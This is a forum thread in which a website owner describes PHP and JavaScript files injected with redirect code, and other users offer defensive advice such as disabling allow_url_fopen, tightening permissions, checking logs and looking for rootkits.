help finding hacking loopholes

[dflow]

i was attacked by a redirect php injection

 

my pc is clean of viruses

 

so i figure that either my hosting server was hacked

or that my php was hacked

 

the hack was an injection of some redirect eval(gikljhoihdalnbd) bullshit

 

and an injection into the bottom end of all js files

 

anyone experience this kind hack before?

and if so what can i do to prevent it?

[gizmola]

I'm not sure what you mean by redirect php injection.  I'm also not sure what you mean about your javascript files.  Were they physically changed on the server so that they now include the crackers bad jscript?

 

The only way to figure out what happened is to analyze the system and the logs. 

 

Is allow_url_fopen = On set in your php.ini? 

 

 

[dflow]

I'm not sure what you mean by redirect php injection.  I'm also not sure what you mean about your javascript files.  Were they physically changed on the server so that they now include the crackers bad jscript?

 

The only way to figure out what happened is to analyze the system and the logs. 

 

Is allow_url_fopen = On set in your php.ini? 

 

 

allow_url_fopen = On set in your php.ini?

yes it is on

i found changes in the php files

 

and the javascripts now include a line from the cracker

[GKWelding]

if physical files on your server have been changed then i would say it's more likely the web server has been compromised than code.

[dflow]

if physical files on your server have been changed then i would say it's more likely the web server has been compromised than code.

 

i thought maybe i had a virus that attacked my ftp client and uploaded it

got my password etc

but no viruses

 

 

[gizmola]

I don't agree at all  -- simple code could mistakes and permissions issues could explain what happened.  This is why looking at your web logs is important.  Here's my thoughts --

 

1st turn off allow_url_fopen to off for now.  What that does is allow you to specify url's in all sorts of places including requires and includes.  This is referred to as remote execution.  If they can find any script that builds require or includes paths in an insecure way, they can trick your server into reading code from their server.  allow_url_fopen will turn this off for now.

 

Secondarily, modify your permissions on the code directories so that they don't allow write for apache.

 

Replace all the original scripts and javascripts and in the meantime start pouring over and grepping your logs looking for weird urls and in particular anything that includes http://notyourserver in url's. 

 

Also make sure you look in your tmp directory.  Often rootkits will be deposited initally in there.  If you believe there's a chance you were rootkitted, you need to find out asap.  Since they seemed to want to exploit your site and don't mind you knowing it, this might bode well for you, as usually they rootkit in order to turn your server into an ftp repo, spam relay, or shadow website.  They'll often start up connections to an irc server in order to remote control it via an irc channel. 

 

If this is a redhat/centos based server, you have the great tool of rpm to help figure this out, since all the package contents have md5 hashes, you can use rpm to look at the basic packages that a rootkit will screw with, that goes after login, ps, sshd, etc.

 

lsof is a great tool, but sometimes that gets rootkitted too. 

 

Again, if it's possible for now, disable php uploads until you figure out what has happened.  Try and lock down the server as much as possible while you're doing this.  Are you running any standard packages (phpBB, wordpress, etc.) on the server, that might be the source of the exploit?  More often than not, exploits are the result of script kiddies who are running an exploit against a particular package.  It's very important to figure this out, and patch any holes, or you'll get exploited again.

[Gayner]

PHP Is Server side how can people hack unless u got admins of ur servers that hate u am i correct broh?

[gizmola]

PHP Is Server side how can people hack unless u got admins of ur servers that hate u am i correct broh?

 

No, as I just explained, the most common way people get exploited is via script kiddies who are exploiting a vulnerability in a particular package.  When you have custom software, that requires someone to really do a lot of testing on an app where they don't have the source code.  They can try some things, but they're just guessing. 

 

Compare that with something like phpBB.  There's are tens of thousands of sites running phpBB, so if someone finds an exploit in it, and puts it into an exploit script, they can easily use google to identify a long list of potential victims and then let their bot just run through those, letting the exploit kit do the work.  There's absolutely no thought put into it, and they don't know you nor do they care who you are.

 

I have a site for example, that is somewhat old and has a contact form.  Every single day I get emails from this contact form that have a bunch of links in them.  Clearly there is nothing to be gained from someone posting a form with a bunch of links to offshore viagra sites, that will simply be cleaned out by my spam filter.  I continue to receive these because it's a Bot doing the sending that is simply looking for forms and attempting to stick in links and post them.  A simple captcha easily defeats this, but I've been too lazy to add it to the contact form. 

 

With that said, it is in no way personal, that spammers continue to send these emails day in and day out.  If they did, they would quickly realize that it is a complete waste of time to post these to a contact form.

 

 

[dflow]

thanks ill go over my logs

 

i updated avast regarding this exploit so at least now i get an alert

 

the site has been stable for a few days

 

so i did something right

 

changed ftp codes after backup

turned off allow_url_fopen

 

also changed ftp client